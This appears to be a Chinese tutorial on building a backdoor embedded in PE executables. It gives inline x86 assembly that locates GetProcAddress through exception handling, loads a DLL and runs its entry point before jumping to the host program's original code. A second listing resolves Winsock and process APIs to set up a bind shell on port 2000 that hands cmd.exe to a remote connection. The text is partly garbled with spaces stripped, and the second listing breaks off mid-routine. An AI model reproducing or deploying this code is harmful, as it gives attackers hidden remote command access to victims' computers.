PE可执行文件的镶入式程序后门开发
- /*
- 利用异常结构处理搜索GetProcAddress入口地址
- */
- #include<STDIO.H>
- #include<WINDOWS.H>
- main()
- {
- _asm
- {
- callex//取得当前地址以计算异常结构开始的地址
- moveax,0x77000000
- mov[ebp-0ch],eax
- moveax,esp
- subeax,8
- xchgfs:[0],eax
- movDWORDptr[ebp-00h],eax
- moveax,fs:[4]
- movDWORDptr[ebp-04h],eax
- movfs:[4h],ebp//保存ebp到fs:[4h]中
- addecx,34h
- pushecx
- pusheax
- movedx,0
- movbyteptr[edx],0//产生错误
- }
- //异常结构开始
- _asm
- {
- movebp,fs:[4]
- movdwordptr[ebp-8h],0
- //for(;imgbase<0xff000000,procgetadd==0;){
- e104f:
- cmpdwordptr[ebp-8h],0
- jneexi
- //imgbase+=0x10000;
- moveax,[ebp-0ch]
- addeax,10000h
- mov[ebp-0ch],eax
- //if(imgbase==0x78000000)imgbase=0xbff00000;
- cmpdwordptr[ebp-0ch],78000000h
- jneis44
- movdwordptr[ebp-0ch],0BFF00000h
- /*if(*(WORD*)imgbase=='ZM'&&*(WORD*)(imgbase+*(int
- *)(imgbase+0x3c))=='EP'){*/
- is44:
- movecx,dwordptr[ebp-0ch]
- xoredx,edx
- movdx,wordptr[ecx]
- movdwordptr[ebp-24h],ecx
- cmpedx,5A4Dh//ZM
- jnee11db
- moveax,[ebp-0ch]
- movecx,dwordptr[eax+3Ch]
- movedx,dwordptr[ebp-0ch]
- xoreax,eax
- movax,wordptr[edx+ecx]
- cmpeax,4550h
- jnee11db
- //fnbase=*(int*)(imgbase+*(int*)(imgbase+0x3c)+0x78)+imgbase;
- movecx,dwordptr[ebp-0ch]
- movedx,dwordptr[ecx+3Ch]
- moveax,[ebp-0ch]
- movecx,dwordptr[eax+edx+78h]
- addecx,dwordptr[ebp-0ch]
- movdwordptr[ebp-10h],ecx
- //k=*(int*)(fnbase+0xc)+imgbase;
- movedx,dwordptr[ebp-10h]
- moveax,dwordptr[edx+0Ch]
- addeax,dwordptr[ebp-0ch]
- movdwordptr[ebp-14h],eax
- //if(*(int*)k=='NREK'&&*(int*)(k+4)=='23LE'){
- movecx,dwordptr[ebp-14h]
- cmpdwordptr[ecx],4E52454Bh
- jnee11db
- movedx,dwordptr[ebp-14h]
- cmpdwordptr[edx+4],32334C45h
- jnee11db
- //k=imgbase+*(int*)(fnbase+0x20);
- moveax,dwordptr[ebp-10h]
- movecx,dwordptr[ebp-0ch]
- addecx,dwordptr[eax+20h]
- movdwordptr[ebp-14h],ecx
- //for(l=0;l<*(int*)(fnbase+0x18);++l,k+=4){
- movdwordptr[ebp-18h],0
- jmpe1127
- e1115:
- movedx,dwordptr[ebp-18h]
- addedx,1
- movdwordptr[ebp-18h],edx
- moveax,dwordptr[ebp-14h]
- addeax,4
- movdwordptr[ebp-14h],eax
- e1127:
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ebp-18h]
- cmpedx,dwordptr[ecx+18h]
- jgee11db
- /*if(*(int*)(imgbase+*(int*)k)=='tixE'&&*(int*)(4+imgbase+*(int
- *)k)=='corP'){GetProcAddress*/
- moveax,dwordptr[ebp-14h]
- movecx,dwordptr[eax]
- movedx,dwordptr[ebp-0ch]
- cmpdwordptr[edx+ecx],'PteG'
- jnee11d6
- moveax,dwordptr[ebp-14h]
- movecx,dwordptr[eax]
- movedx,dwordptr[ebp-0ch]
- cmpdwordptr[edx+ecx+4],'Acor'
- jnee11d6
- //k=*(WORD*)(l+l+imgbase+*(int*)(fnbase+0x24));
- moveax,dwordptr[ebp-18h]
- addeax,dwordptr[ebp-18h]
- addeax,dwordptr[ebp-0ch]
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ecx+24h]
- xorecx,ecx
- movcx,wordptr[eax+edx]
- movdwordptr[ebp-14h],ecx
- //k+=*(int*)(fnbase+0x10)-1;
- movedx,dwordptr[ebp-10h]
- moveax,dwordptr[edx+10h]
- movecx,dwordptr[ebp-14h]
- leaedx,dwordptr[ecx+eax-1]
- movdwordptr[ebp-14h],edx
- //k=*(int*)(k+k+k+k+imgbase+*(int*)(fnbase+0x1c));
- moveax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-0ch]
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ecx+1Ch]
- moveax,dwordptr[eax+edx]
- movdwordptr[ebp-14h],eax
- movedx,dwordptr[ebp-14h]
- //addedx,imgbase
- addedx,dwordptr[ebp-0ch]
- //movprocgetadd,edx
- movdwordptr[ebp-8h],edx
- //恢复异常结构
- moveax,DWORDptr[ebp-00h]
- movfs:[0],eax
- moveax,DWORDptr[ebp-04h]
- movfs:[4],eax
- jmpe11db
- e11d6:
- jmpe1115
- e11db:
- jmpe104f
- }
- //////////////////////////////////////////////////////////////
- exi:
- //取得LoadLibraryA入口地址
- _asm
- {
- movdwordptr[ebp-124h],'daoL'
- movdwordptr[ebp-120h],'rbiL'
- movdwordptr[ebp-11Ch],'Ayra'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- movebx,dwordptr[ebp-24h]//kernel32.dll入口地址
- pushebx
- moveax,dwordptr[ebp-8h]
- movdwordptr[ebp-4008h],eax//GetProcAddress入口地址
- calleax
- movdwordptr[ebp-400ch],eax//LoadLibraryA入口地址
- }
- //加载mydll.dll
- _asm
- {
- movdwordptr[ebp-124h],'ldym'
- movdwordptr[ebp-120h],'ld.l'
- movdwordptr[ebp-11Ch],'l'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- calldwordptr[ebp-400ch]
- cmpeax,0
- jzexit1
- movebx,eax
- //取得mybegin入口地址
- movdwordptr[ebp-124h],'gebM'
- movdwordptr[ebp-120h],'ni'
- movdwordptr[ebp-11Ch],0000h
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-4008h]
- movdwordptr[ebp-4030h],eax//mybegin入口地址
- cmpeax,0
- jzexit1
- calleax//执行mybegin
- jmpexit1
- }
- ex:
- _asm
- {
- popecx
- pushecx
- ret
- }
- exit1:
- _asm
- {
- moveax,0x401000//这个跳转地址在代码中需要更改
- jmpeax
- }
- return0;
- }
/* 利用异常结构处理搜索GetProcAddress入口地址 */ #include #include main() { _asm { call ex//取得当前地址以计算异常结构开始的地址 mov eax,0x77000000 mov [ebp-0ch],eax mov eax,esp sub eax,8 xchg fs:[0],eax mov DWORD ptr[ebp-00h],eax mov eax,fs:[4] mov DWORD ptr[ebp-04h],eax mov fs:[4h],ebp//保存ebp到fs:[4h]中 add ecx,34h push ecx push eax mov edx,0 mov byte ptr [edx],0//产生错误 } //异常结构开始 _asm { mov ebp,fs:[4] mov dword ptr [ebp-8h],0 //for(;imgbase<0xff000000,procgetadd==0;){ e104f: cmp dword ptr [ebp-8h],0 jne exi //imgbase+=0x10000; mov eax,[ebp-0ch] add eax,10000h mov [ebp-0ch],eax //if(imgbase==0x78000000) imgbase=0xbff00000; cmp dword ptr [ebp-0ch],78000000h jne is44 mov dword ptr [ebp-0ch],0BFF00000h /*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){*/ is44: mov ecx,dword ptr [ebp-0ch] xor edx,edx mov dx,word ptr [ecx] mov dword ptr [ebp-24h],ecx cmp edx,5A4Dh//ZM jne e11db mov eax,[ebp-0ch] mov ecx,dword ptr [eax+3Ch] mov edx,dword ptr [ebp-0ch] xor eax,eax mov ax,word ptr [edx+ecx] cmp eax,4550h jne e11db //fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; mov ecx,dword ptr [ebp-0ch] mov edx,dword ptr [ecx+3Ch] mov eax,[ebp-0ch] mov ecx,dword ptr [eax+edx+78h] add ecx,dword ptr [ebp-0ch] mov dword ptr [ebp-10h],ecx // k=*(int *)(fnbase+0xc)+imgbase; mov edx,dword ptr [ebp-10h] mov eax,dword ptr [edx+0Ch] add eax,dword ptr [ebp-0ch] mov dword ptr [ebp-14h],eax //if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ mov ecx,dword ptr [ebp-14h] cmp dword ptr [ecx],4E52454Bh jne e11db mov edx,dword ptr [ebp-14h] cmp dword ptr [edx+4],32334C45h jne e11db //k=imgbase+*(int *)(fnbase+0x20); mov eax,dword ptr [ebp-10h] mov ecx,dword ptr [ebp-0ch] add ecx,dword ptr [eax+20h] mov dword ptr [ebp-14h],ecx //for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ mov dword ptr [ebp-18h],0 jmp e1127 e1115: mov edx,dword ptr [ebp-18h] add edx,1 mov dword ptr [ebp-18h],edx mov eax,dword ptr [ebp-14h] add eax,4 mov dword ptr [ebp-14h],eax e1127: mov ecx,dword ptr [ebp-10h] mov edx,dword ptr 
[ebp-18h] cmp edx,dword ptr [ecx+18h] jge e11db /*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int *)k)=='corP'){GetProcAddress*/ mov eax,dword ptr [ebp-14h] mov ecx,dword ptr [eax] mov edx,dword ptr [ebp-0ch] cmp dword ptr [edx+ecx],'PteG' jne e11d6 mov eax,dword ptr [ebp-14h] mov ecx,dword ptr [eax] mov edx,dword ptr [ebp-0ch] cmp dword ptr [edx+ecx+4],'Acor' jne e11d6 //k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); mov eax,dword ptr [ebp-18h] add eax,dword ptr [ebp-18h] add eax,dword ptr [ebp-0ch] mov ecx,dword ptr [ebp-10h] mov edx,dword ptr [ecx+24h] xor ecx,ecx mov cx,word ptr [eax+edx] mov dword ptr [ebp-14h],ecx //k+=*(int *)(fnbase+0x10)-1; mov edx,dword ptr [ebp-10h] mov eax,dword ptr [edx+10h] mov ecx,dword ptr [ebp-14h] lea edx,dword ptr [ecx+eax-1] mov dword ptr [ebp-14h],edx //k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); mov eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-0ch] mov ecx,dword ptr [ebp-10h] mov edx,dword ptr [ecx+1Ch] mov eax,dword ptr [eax+edx] mov dword ptr [ebp-14h],eax mov edx,dword ptr [ebp-14h] //add edx,imgbase add edx,dword ptr [ebp-0ch] // mov procgetadd,edx mov dword ptr [ebp-8h],edx //恢复异常结构 mov eax,DWORD ptr[ebp-00h] mov fs:[0],eax mov eax,DWORD ptr[ebp-04h] mov fs:[4],eax jmp e11db e11d6: jmp e1115 e11db: jmp e104f } ////////////////////////////////////////////////////////////// exi: //取得LoadLibraryA入口地址 _asm { mov dword ptr [ebp-124h],'daoL' mov dword ptr [ebp-120h],'rbiL' mov dword ptr [ebp-11Ch],'Ayra' mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push eax mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址 push ebx mov eax,dword ptr [ebp-8h] mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址 call eax mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址 } //加载 mydll.dll _asm { mov dword ptr [ebp-124h],'ldym' mov dword ptr [ebp-120h],'ld.l' mov dword ptr [ebp-11Ch],'l' mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push 
eax call dword ptr [ebp-400ch] cmp eax,0 jz exit1 mov ebx,eax //取得mybegin入口地址 mov dword ptr [ebp-124h],'gebM' mov dword ptr [ebp-120h],'ni' mov dword ptr [ebp-11Ch],0000h mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push eax push ebx call dword ptr [ebp-4008h] mov dword ptr [ebp-4030h],eax//mybegin入口地址 cmp eax,0 jz exit1 call eax //执行mybegin jmp exit1 } ex: _asm { pop ecx push ecx ret } exit1: _asm { mov eax,0x401000 //这个跳转地址在代码中需要更改 jmp eax } return 0; }
- /*
- 利用异常结构处理搜索GetProcAddress入口地址
- 然后用这个函数加载其他api函数.实现线程一个返回另一个
- 绑定cmd.exe或command.com功能
- */
- #include<STDIO.H>
- #include<WINDOWS.H>
- main()
- {
- _asm
- {
- callex
- moveax,0x77000000
- mov[ebp-0ch],eax
- moveax,esp
- subeax,8
- xchgfs:[0],eax
- movDWORDptr[ebp-00h],eax
- moveax,fs:[4]
- movDWORDptr[ebp-04h],eax
- movfs:[4h],ebp
- addecx,34h
- pushecx
- pusheax
- movedx,0
- movbyteptr[edx],0
- movebp,fs:[4]
- movdwordptr[ebp-8h],0
- e104f:
- cmpdwordptr[ebp-8h],0
- jneexi
- moveax,[ebp-0ch]
- addeax,10000h
- mov[ebp-0ch],eax
- cmpdwordptr[ebp-0ch],78000000h
- jneis44
- movdwordptr[ebp-0ch],0BFF00000h
- is44:
- movecx,dwordptr[ebp-0ch]
- xoredx,edx
- movdx,wordptr[ecx]
- movdwordptr[ebp-24h],ecx
- cmpedx,5A4Dh//ZM
- jnee11db
- moveax,[ebp-0ch]
- movecx,dwordptr[eax+3Ch]
- movedx,dwordptr[ebp-0ch]
- xoreax,eax
- movax,wordptr[edx+ecx]
- cmpeax,4550h
- jnee11db
- movecx,dwordptr[ebp-0ch]
- movedx,dwordptr[ecx+3Ch]
- moveax,[ebp-0ch]
- movecx,dwordptr[eax+edx+78h]
- addecx,dwordptr[ebp-0ch]
- movdwordptr[ebp-10h],ecx
- movedx,dwordptr[ebp-10h]
- moveax,dwordptr[edx+0Ch]
- addeax,dwordptr[ebp-0ch]
- movdwordptr[ebp-14h],eax
- movecx,dwordptr[ebp-14h]
- cmpdwordptr[ecx],4E52454Bh
- jnee11db
- movedx,dwordptr[ebp-14h]
- cmpdwordptr[edx+4],32334C45h
- jnee11db
- moveax,dwordptr[ebp-10h]
- movecx,dwordptr[ebp-0ch]
- addecx,dwordptr[eax+20h]
- movdwordptr[ebp-14h],ecx
- movdwordptr[ebp-18h],0
- jmpe1127
- e1115:
- movedx,dwordptr[ebp-18h]
- addedx,1
- movdwordptr[ebp-18h],edx
- moveax,dwordptr[ebp-14h]
- addeax,4
- movdwordptr[ebp-14h],eax
- e1127:
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ebp-18h]
- cmpedx,dwordptr[ecx+18h]
- jgee11db
- moveax,dwordptr[ebp-14h]
- movecx,dwordptr[eax]
- movedx,dwordptr[ebp-0ch]
- cmpdwordptr[edx+ecx],'PteG'
- jnee11d6
- moveax,dwordptr[ebp-14h]
- movecx,dwordptr[eax]
- movedx,dwordptr[ebp-0ch]
- cmpdwordptr[edx+ecx+4],'Acor'
- jnee11d6
- moveax,dwordptr[ebp-18h]
- addeax,dwordptr[ebp-18h]
- addeax,dwordptr[ebp-0ch]
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ecx+24h]
- xorecx,ecx
- movcx,wordptr[eax+edx]
- movdwordptr[ebp-14h],ecx
- movedx,dwordptr[ebp-10h]
- moveax,dwordptr[edx+10h]
- movecx,dwordptr[ebp-14h]
- leaedx,dwordptr[ecx+eax-1]
- movdwordptr[ebp-14h],edx
- moveax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-14h]
- addeax,dwordptr[ebp-0ch]
- movecx,dwordptr[ebp-10h]
- movedx,dwordptr[ecx+1Ch]
- moveax,dwordptr[eax+edx]
- movdwordptr[ebp-14h],eax
- movedx,dwordptr[ebp-14h]
- addedx,dwordptr[ebp-0ch]
- movdwordptr[ebp-8h],edx
- //恢复异常结构
- moveax,DWORDptr[ebp-00h]
- movfs:[0],eax
- moveax,DWORDptr[ebp-04h]
- movfs:[4],eax
- jmpe11db
- e11d6:
- jmpe1115
- e11db:
- jmpe104f
- }
- //////////////////////////////////////////////////////////////
- exi:
- //取得各个需要函数的地址
- //取得LoadLibraryA入口地址
- _asm
- {
- callex1
- movdwordptr[ecx-0C70h],ebp
- movdwordptr[ebp-124h],'daoL'
- movdwordptr[ebp-120h],'rbiL'
- movdwordptr[ebp-11Ch],'Ayra'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- movebx,dwordptr[ebp-24h]//kernel32.dll入口地址
- pushebx
- moveax,dwordptr[ebp-8h]
- movdwordptr[ebp-4008h],eax//GetProcAddress入口地址
- calleax
- movdwordptr[ebp-400ch],eax//LoadLibraryA入口地址
- //CreatePipe入口地址
- movdwordptr[ebp-124h],'aerC'
- movdwordptr[ebp-120h],'iPet'
- movdwordptr[ebp-11Ch],'ep'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4000h],eax//CreatePipe入口地址
- cmpeax,0
- jzexit1
- //GetVersion入口地址
- movdwordptr[ebp-124h],'VteG'
- movdwordptr[ebp-120h],'isre'
- movdwordptr[ebp-11Ch],'no'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4004h],eax//GetVersion入口地址
- cmpeax,0
- jzexit1
- //CloseHandle入口地址
- movdwordptr[ebp-124h],'solC'
- movdwordptr[ebp-120h],'naHe'
- movdwordptr[ebp-11Ch],'eld'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4010h],eax//CloseHandle入口地址
- cmpeax,0
- jzexit1
- //ExitThread入口地址
- movdwordptr[ebp-124h],'tixE'
- movdwordptr[ebp-120h],'erhT'
- movdwordptr[ebp-11Ch],'da'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4014h],eax//ExitThread入口地址
- cmpeax,0
- jzexit1
- //Sleep入口地址
- movdwordptr[ebp-124h],'eelS'
- movdwordptr[ebp-120h],'p'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4018h],eax//Sleep入口地址
- cmpeax,0
- jzexit1
- //WriteFile入口地址
- movdwordptr[ebp-124h],'tirW'
- movdwordptr[ebp-120h],'liFe'
- movdwordptr[ebp-11Ch],'e'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-401Ch],eax//WriteFile入口地址
- cmpeax,0
- jzexit1
- //PeekNamedPipe入口地址
- movdwordptr[ebp-124h],'keeP'
- movdwordptr[ebp-120h],'emaN'
- movdwordptr[ebp-11Ch],'piPd'
- movdwordptr[ebp-118h],'e'
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4020h],eax//PeekNamedPipe入口地址
- cmpeax,0
- jzexit1
- //ReadFile入口地址
- movdwordptr[ebp-124h],'daeR'
- movdwordptr[ebp-120h],'eliF'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4024h],eax//ReadFile入口地址
- cmpeax,0
- jzexit1
- //GetStartupInfoA入口地址
- movdwordptr[ebp-124h],'SteG'
- movdwordptr[ebp-120h],'trat'
- movdwordptr[ebp-11Ch],'nIpu'
- movdwordptr[ebp-118h],'Aof'
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4028h],eax//GetStartupInfoA入口地址
- cmpeax,0
- jzexit1
- //CreateProcessA入口地址
- movdwordptr[ebp-124h],'aerC'
- movdwordptr[ebp-120h],'rPet'
- movdwordptr[ebp-11Ch],'seco'
- movdwordptr[ebp-118h],'As'
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-402Ch],eax//CreateProcessA入口地址
- cmpeax,0
- jzexit1
- //CreateThread入口地址
- movdwordptr[ebp-124h],'aerC'
- movdwordptr[ebp-120h],'hTet'
- movdwordptr[ebp-11Ch],'daer'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4008h],eax//CreateThread入口地址
- cmpeax,0
- jzexit1
- }
- //loadwsock32.dll
- _asm
- {
- movdwordptr[ebp-124h],'cosw'
- movdwordptr[ebp-120h],'.23k'
- movdwordptr[ebp-11Ch],'lld'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- calldwordptr[ebp-400ch]
- cmpeax,0
- jzexit1
- movebx,eax
- //WSAStartup入口地址
- movdwordptr[ebp-124h],'SASW'
- movdwordptr[ebp-120h],'trat'
- movdwordptr[ebp-11Ch],'pu'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4030h],eax//WSAStartup入口地址
- cmpeax,0
- jzexit1
- //__WSAFDIsSet入口地址
- movdwordptr[ebp-124h],'SW__'
- movdwordptr[ebp-120h],'IDFA'
- movdwordptr[ebp-11Ch],'teSs'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4034h],eax//__WSAFDIsSet入口地址
- cmpeax,0
- jzexit1
- //socket入口地址
- movdwordptr[ebp-124h],'kcos'
- movdwordptr[ebp-120h],'te'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4038h],eax//socket入口地址
- cmpeax,0
- jzexit1
- //closesocket入口地址
- movdwordptr[ebp-124h],'solc'
- movdwordptr[ebp-120h],'cose'
- movdwordptr[ebp-11Ch],'tek'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-403Ch],eax//closesocket入口地址
- cmpeax,0
- jzexit1
- //select入口地址
- movdwordptr[ebp-124h],'eles'
- movdwordptr[ebp-120h],'tc'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4040h],eax//select入口地址
- cmpeax,0
- jzexit1
- //recv入口地址
- movdwordptr[ebp-124h],'vcer'
- movdwordptr[ebp-120h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4044h],eax//recv入口地址
- cmpeax,0
- jzexit1
- //send入口地址
- movdwordptr[ebp-124h],'dnes'
- movdwordptr[ebp-120h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4048h],eax//send入口地址
- cmpeax,0
- jzexit1
- //htons入口地址
- movdwordptr[ebp-124h],'noth'
- movdwordptr[ebp-120h],'s'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-404Ch],eax//htons入口地址
- cmpeax,0
- jzexit1
- //bind入口地址
- movdwordptr[ebp-124h],'dnib'
- movdwordptr[ebp-120h],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4050h],eax//bind入口地址
- cmpeax,0
- jzexit1
- //listen入口地址
- movdwordptr[ebp-124h],'tsil'
- movdwordptr[ebp-120h],'ne'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4054h],eax//listen入口地址
- cmpeax,0
- jzexit1
- //accept入口地址
- movdwordptr[ebp-124h],'ecca'
- movdwordptr[ebp-120h],'tp'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4058h],eax//accept入口地址
- cmpeax,0
- jzexit1
- }
- //loadmsvcrt.dll
- _asm
- {
- movdwordptr[ebp-124h],'cvsm'
- movdwordptr[ebp-120h],'d.tr'
- movdwordptr[ebp-11Ch],'ll'
- movdwordptr[ebp-118h],0000h
- leaeax,[ebp-124h]
- pusheax
- calldwordptr[ebp-400ch]
- cmpeax,0
- jzexit1
- movebx,eax
- //memset入口地址
- movdwordptr[ebp-124h],'smem'
- movdwordptr[ebp-120h],'te'
- movdwordptr[ebp-11Ch],0000h
- leaeax,[ebp-124h]
- pusheax
- pushebx
- calldwordptr[ebp-8h]
- movdwordptr[ebp-4090h],eax//memset入口地址
- cmpeax,0
- jzexit1
- }
- //////////////////////////////////////////////////////////////
- //建立后门线程
- /////////////////////////////////////////////////////////////
- _asm
- {
- callex
- addecx,32h//取得后门代码的地址
- movdwordptr[ebp-8],1
- movdwordptr[ebp-0Ch],0
- movdwordptr[ebp-10h],0Ch
- leaeax,[ebp-4]
- pusheax
- push0
- push0
- pushecx
- push0
- leaecx,[ebp-10h]
- pushecx
- calldwordptr[ebp-4008h]
- callexit1//返回真正的代码
- }
- //////////////////////////////////////////////////////////////
- //建立后门
- /////////////////////////////////////////////////////////////
- _asm
- {
- moveax,0x400
- callex1
- movebp,dwordptr[ecx-0C70h]
- movbyteptr[ebp-1340h],0Dh
- movdwordptr[ebp-11ECh],0FFFFFFFFh
- movdwordptr[ebp-1DCh],0
- movdwordptr[ebp-1D8h],32h
- movdwordptr[ebp-1E4h],10h
- calldwordptr[ebp-4004h]
- cmpeax,80000000h
- jnbloc_0040106C
- movdwordptr[ebp-11ECh],1
- movdwordptr[ebp-4118h],'.dmc'
- movdwordptr[ebp-4114h],'exe'
- movdwordptr[ebp-4110h],00000000h
- jmploc_0040107D
- loc_0040106C:
- movdwordptr[ebp-11ECh],0
- movdwordptr[ebp-4118h],'mmoc'
- movdwordptr[ebp-4114h],'.dna'
- movdwordptr[ebp-4110h],'moc'
- loc_0040107D:
- leaeax,[ebp-1D4h]
- pusheax
- push101h
- calldwordptr[ebp-4030h]
- push0
- push1
- push2
- calldwordptr[ebp-4038h]
- mov[ebp-30h],eax
- push0
- push1
- push2
- calldwordptr[ebp-4038h]
- mov[ebp-12F8h],eax
- movwordptr[ebp-28h],2
- push7D0h
- calldwordptr[ebp-404Ch]
- mov[ebp-26h],ax
- movdwordptr[ebp-24h],0
- movdwordptr[ebp-44h],0Ch
- movdwordptr[ebp-40h],0
- movdwordptr[ebp-3Ch],1
- push10h
- leaecx,[ebp-28h]
- pushecx
- movedx,[ebp-30h]
- pushedx
- calldwordptr[ebp-4050h]
- push2
- moveax,[ebp-30h]
- pusheax
- calldwordptr[ebp-4054h]
- loc_004010F7:
- leaecx,[ebp-1E4h]
- pushecx
- leaedx,[ebp-28h]
- pushedx
- moveax,[ebp-30h]
- pusheax
- calldwordptr[ebp-4058h]
- mov[ebp-12F8h],eax
- cmpdwordptr[ebp-12F8h],0FFFFFFFFh
- jnzloc_00401121
- xoreax,eax
- jmploc_00401419
- loc_00401121:
- push0
- leaecx,[ebp-44h]
- pushecx
- leaedx,[ebp-34h]
- pushedx
- leaeax,[ebp-38h]
- pusheax
- calldwordptr[ebp-4000h]
- testeax,eax
- jnzloc_00401140
- xoreax,eax
- jmploc_00401419
- loc_00401140:
- push0
- leaecx,[ebp-44h]
- pushecx
- leaedx,[ebp-1E0h]
- pushedx
- leaeax,[ebp-2Ch]
- pusheax
- calldwordptr[ebp-4000h]
- push44h
- push0
- leaecx,[ebp-133Ch]
- pushecx
- calldwordptr[ebp-4090h]
- addesp,0Ch
- leaedx,[ebp-133Ch]
- pushedx
- calldwordptr[ebp-4028h]
- movdwordptr[ebp-133Ch],44h
- movdwordptr[ebp-1310h],101h
- movwordptr[ebp-130Ch],0
- moveax,[ebp-34h]
- mov[ebp-12FCh],eax
- movecx,[ebp-2Ch]
- mov[ebp-1304h],ecx
- movedx,[ebp-34h]
- mov[ebp-1300h],edx
- leaeax,[ebp-14h]
- pusheax
- leaecx,[ebp-133Ch]
- pushecx
- push0
- push0
- push0
- push1
- push0
- push0
- leaedx,[ebp-4118h]
- pushedx
- push0
- calldwordptr[ebp-402Ch]
- testeax,eax
- jnzloc_004011DD
- xoreax,eax
- jmploc_00401419
- loc_004011DD:
- push0C8h
- calldwordptr[ebp-4018h]
- loc_004011E8:
- moveax,1
- testeax,eax
- jeloc_004013C8
- push1000h
- push0
- leaecx,[ebp-11E8h]
- pushecx
- calldwordptr[ebp-4090h]
- addesp,0Ch
- movdwordptr[ebp-12F4h],0
- loc_00401215:
- cmpdwordptr[ebp-12F4h],40h
- jnbloc_00401240
- movedx,[ebp-12F4h]
- moveax,[ebp-12F8h]
- mov[ebp+edx*4-12F0h],eax
- movecx,[ebp-12F4h]
- addecx,1
- mov[ebp-12F4h],ecx
- loc_00401240:
- xoredx,edx
- testedx,edx
- jnzloc_00401215
- leaeax,[ebp-1DCh]
- pusheax
- push0
- push0
- leaecx,[ebp-12F4h]
- pushecx
- push0
- calldwordptr[ebp-4040h]
- mov[ebp-11F0h],eax
- cmpdwordptr[ebp-11F0h],0
- jeloc_00401338
- cmpdwordptr[ebp-11F0h],0FFFFFFFFh
- jeloc_00401338
- leaedx,[ebp-12F4h]
- pushedx
- moveax,[ebp-12F8h]
- pusheax
- calldwordptr[ebp-4034h]
- testeax,eax
- jzloc_004012B6
- push0
- push1000h
- leaecx,[ebp-11E8h]
- pushecx
- movedx,[ebp-12F8h]
- pushedx
